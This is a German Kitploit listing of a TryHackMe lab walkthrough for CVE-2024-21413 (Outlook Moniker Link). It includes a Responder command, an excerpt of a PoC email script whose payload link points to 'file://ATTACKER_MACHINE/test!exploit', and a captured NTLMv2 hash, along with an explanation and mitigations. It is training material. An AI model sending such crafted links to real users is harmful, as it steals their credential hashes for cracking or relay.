Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
tryhackme-monikerlink-writeup — TryHackMe Moniker Link (CVE-2024-21413) Walkthrough: Umgehung der Geschützten Ansicht in Outlook, die über einen manipulierten Moniker-Link zur Erfassung von NTLMv2-Hashes führt. | Kitploit
Tools/GitHubGitHub/omarmahmoud1024/tryhackme-monikerlink-writeup
Phishing-ToolsSchwachstellenanalyseExploitationPhishingCTFLernen & BildungLabs & Praxis
GitHubomarmahmoud1024/tryhackme-monikerlink-writeup

tryhackme-monikerlink-writeup

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

TryHackMe Moniker Link (CVE-2024-21413) Walkthrough: Umgehung der Geschützten Ansicht in Outlook, die über einen manipulierten Moniker-Link zur Erfassung von NTLMv2-Hashes führt.

Repository anzeigen
16vor 1 MonatNoch nicht geprüft
# TryHackMe: Moniker Link — CVE-2024-21413 Walkthrough

Ein vollständiger Walkthrough für [TryHackMes Raum „Moniker Link“](https://tryhackme.com/room/monikerlink): die Ausnutzung von CVE-2024-21413, einer Microsoft-Outlook-Sicherheitslücke aus dem Jahr 2024, um den NTLMv2-Hash eines Opfers zu stehlen, sobald es auf einen Link in einer Phishing-E-Mail klickt – ohne Makro, ohne Anhang, ohne offensichtliche Sicherheitswarnung.

CVE-2024-21413 („Moniker Link“) ist eine Sicherheitslücke in der Art und Weise, wie Outlook `file://`-Links validiert, die die Windows-OLE-„Moniker“-Syntax verwenden (ein nachgestelltes `!` nach dem Pfad, z. B. `file://host/share!something`). Outlook soll externe Dateilinks über die Geschützte Ansicht (Protected View) öffnen, die die Datei in einer Sandbox ausführt und den Benutzer warnt, bevor Anmeldeinformationen durchsickern können. Das zusätzliche `!` stört den URL-Parser von Outlook gerade genug, dass er die Geschützte Ansicht vollständig überspringt und den Link direkt an Windows übergibt, das – weil es wie ein UNC-Pfad aussieht – stillschweigend eine SMB-Authentifizierung gegen den Server des Angreifers versucht. Dieser Authentifizierungsversuch gibt den NTLMv2-Hash des Opfers preis, bevor das Opfer irgendetwas anderes getan hat, als auf einen normal aussehenden Link zu klicken.

## Aufbau des Raums

| Aufgabe | Ziel |
|---|---|
| 1. Aufklärung | Die CVE verstehen und wie der Moniker-Link-Parserfehler die Geschützte Ansicht umgeht |
| 2. Listener einrichten | Responder starten, um ausgehende SMB-Authentifizierung abzufangen |
| 3. Aufbereiten | Eine Phishing-E-Mail mit einem bösartigen Moniker-Link erstellen |
| 4. Zustellen | Die E-Mail an das Postfach des Opfers senden |
| 5. Erfassen | Das Opfer auf den Link klicken lassen und seinen NTLMv2-Hash erfassen |

## Walkthrough

### 1. Listener einrichten

```
responder -I ens5
```

Responder wird auf dem Interface der Angreifer-Maschine gestartet, bevor irgendetwas gesendet wird, mit aktiviertem LLMNR-, NBT-NS- und DNS-Poisoning. Genau das fängt den Leak der Anmeldedaten ab: Sobald der Exploit Outlook dazu verleitet, eine SMB-Authentifizierung gegen die IP des Angreifers zu versuchen, lauscht Responder am anderen Ende, um sie abzufangen.

![Responder lauscht auf ens5](https://assets.kitploit.com/production/public/readmes/49297/a8e918a33785fff8be3ee894d40a0be9fbb153819aba5b10c177aba40a37e783.png)

### 1. Aufklärung — das Postfach des Opfers

Das Ziel ist ein standardmäßiges Outlook-Postfach, `[email protected]`, das sich vor Eintreffen der Phishing-E-Mail in der normalen Posteingangsansicht befindet – die Ausgangsbasis, auf der der Rest des Raums aufbaut.

![Outlook-Posteingang des Opfers vor dem Angriff](https://assets.kitploit.com/production/public/readmes/49297/3a639983b71c6ca96139b5e7179b4b397234e41816edbdb705a5181b1d3ee65b.png)

### 3. Aufbereiten — das Exploit-Skript

```python
sender_email = '[email protected]'
receiver_email = '[email protected]'
...
<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>
```

Der Exploit (CMNatics öffentlicher CVE-2024-21413-PoC) ist ein kleines Python-Skript, das eine HTML-E-Mail erstellt und über SMTP sendet. Die Nutzlast steckt vollständig in einer Zeile: ein `<a href="file://...">`-Link, der auf die Maschine des Angreifers zeigt, mit einem nachgestellten `!exploit` am Pfad. Dieses nachgestellte `!` ist der gesamte Fehler – es bringt den Link-Parser von Outlook dazu, die URL falsch zu klassifizieren und die Prüfung der Geschützten Ansicht zu überspringen, die es normalerweise bei einem externen Dateilink anwenden würde.

![exploit.py-Quelltext in nano](https://assets.kitploit.com/production/public/readmes/49297/f51b040cc6110d2f13ba4c18460fac020b7b0b909fdd97482b90572ab9ba3380.png)

### 4. Zustellen — Senden der E-Mail

```
python3 exploit.py
Enter your attacker email password: attacker
Email delivered
```

Wenn das Skript ausgeführt wird, authentifiziert es sich am Mailserver und sendet die präparierte E-Mail an das Opfer. `Email delivered` bestätigt, dass sie das Postfach des Angreifers erfolgreich verlassen hat.

![exploit.py ausführen, E-Mail zugestellt](https://assets.kitploit.com/production/public/readmes/49297/b571948ba8d1ee5200b9c3edb1a8f24f3301b45d72b4be4767a9bf362f61e7b0.png)

### 4. Zustellen — Ankunft im Postfach des Opfers

Die E-Mail kommt im Posteingang von `[email protected]` von `CMNatic` an, Betreff `CVE-2024-21413`, und enthält nichts weiter als einen einzelnen Hyperlink mit dem Text „Click me“ – keinen Anhang, keine Makrowarnung, nichts, was normalerweise einen Phishing-Filter oder einen vorsichtigen Benutzer misstrauisch machen würde.

![Phishing-E-Mail im Posteingang des Opfers](https://assets.kitploit.com/production/public/readmes/49297/c107ac0c034619fc63ca6b84b0d489b4cb90a11b44dd43eb1dce566b4759dc10.png)

### 5. Erfassen — das Opfer klickt auf den Link

Ein Klick auf „Click me“ löst den Windows-Explorer-Fehlerdialog von Outlook aus: *„Wir können '\\10.113.72.84\test!exploit' nicht finden. Bitte stellen Sie sicher, dass Sie den richtigen Speicherort oder die richtige Webadresse verwenden.“* Dieser Fehler ist tatsächlich der Beweis, dass der Exploit bereits funktioniert hat – wenn dieser Dialog erscheint, hat Windows bereits versucht, diesen UNC-Pfad über SMB aufzulösen, und sich dabei bereits bei `10.113.72.84` (der Angreifer-Maschine) authentifiziert. Der sichtbare Fehler ist nur, dass Explorer eine Freigabe nicht findet, die nie existieren sollte; der Leak der Anmeldedaten ist bereits still geschehen, bevor das Fehlerfenster überhaupt auftauchte.

![Outlook-Fehler „UNC-Pfad nicht gefunden“ nach dem Klick auf den Link](https://assets.kitploit.com/production/public/readmes/49297/5e2fe22d0672a269d5835fa36bf1a16846bdb2b84097e82befb52fdaa237f350.png)

### 5. Erfassen — Hash in Responder erfasst

```
[SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme
[SMB] NTLMv2-SSP Hash     : tryhackme::THM-MONIKERLINK:3f2abcd40483ccba:...
```

Zurück auf der Angreifer-Maschine hat Responder bereits den vollständigen NTLMv2-SSP-Handshake für `THM-MONIKERLINK\tryhackme` erfasst, der von `10.113.150.143` (dem Opfer) stammt. Keine Anmeldeaufforderung, keine Sicherheitswarnung und keine Benutzeraktion außer einem einzigen Klick auf einen Link, der wie ein gewöhnlicher Link aussah – der Hash war in dem Moment bereit, geknackt oder für einen Relay-Angriff verwendet zu werden, als Outlook den Moniker-Link falsch verarbeitete.

![Responder erfasst den NTLMv2-Hash](https://assets.kitploit.com/production/public/readmes/49297/c4bdea7e7f17f680c7221a9c9662068ff0bf125d382d3eb6579199f9f261b228.png)

## Verwendete Tools

- **Responder** — LLMNR/NBT-NS/DNS-Poisoning und Erfassung von SMB-Authentifizierungsdaten
- **Ein benutzerdefiniertes Python-SMTP-Skript** (CMNatics CVE-2024-21413-PoC) — erstellt und liefert die bösartige E-Mail mit dem Moniker-Link
- **Microsoft Outlook (Opfer-Client)** — die anfällige Komponente; Version, die von CVE-2024-21413 betroffen ist, vor dem Microsoft-Patch vom Februar 2024

## Wichtigste Erkenntnisse

- **Ein einziges nachgestelltes Zeichen (`!`) war die gesamte Sicherheitslücke.** CVE-2024-21413 ist eine gute Erinnerung daran,
  dass URL-/Pfad-Parser eine häufige Quelle für die Umgehung von Sicherheitsgrenzen sind – eine fehlerhafte Eingabe muss nicht
  komplex sein, um eine Prüfung zu umgehen, sie muss nur in einen Codepfad gelangen, den die Prüfung nicht abdeckt.
- **Die Geschützte Ansicht existiert genau, um diese Art von Angriff zu stoppen**, und die eigentliche Auswirkung des Fehlers war,
  sie still zu umgehen, nicht der NTLM-Leak selbst – NTLM-Relay/-Capture über einen `file://`-Link ist eine alte Technik;
  was diese CVE bemerkenswert machte, war, dass Outlook den Link überhaupt nicht ohne Warnung hätte auslösen lassen dürfen.
- **NTLM-Authentifizierung gibt Anmeldedaten bereits durch den bloßen Versuch preis**, selbst wenn die „Freigabe“ am anderen Ende
  nicht existiert. Das Opfer hat weder ein Passwort eingegeben noch eine Anmeldeaufforderung gesehen; Windows hat einen NTLMv2-Hash
  automatisch als Teil des Versuchs übergeben, einen UNC-Pfad zu durchsuchen (und zu scheitern).
- **Aus Sicht des Opfers ist dies ein nahezu Zero-Click-Angriff** — ein Klick auf einen Link ohne Anhang, ohne Makro und ohne
  offensichtliches Warnsignal genügte. Patchen (Microsoft hat dies im Update vom Februar 2024 behoben) und das Deaktivieren der
  ausgehenden NTLM-Authentifizierung gegenüber nicht vertrauenswürdigen Hosts sind die beiden wirklichen Gegenmaßnahmen;
  Benutzerschulungen allein hätten dies nicht verhindert, da nichts an der E-Mail ungewöhnlich aussah.
Tool herunterladen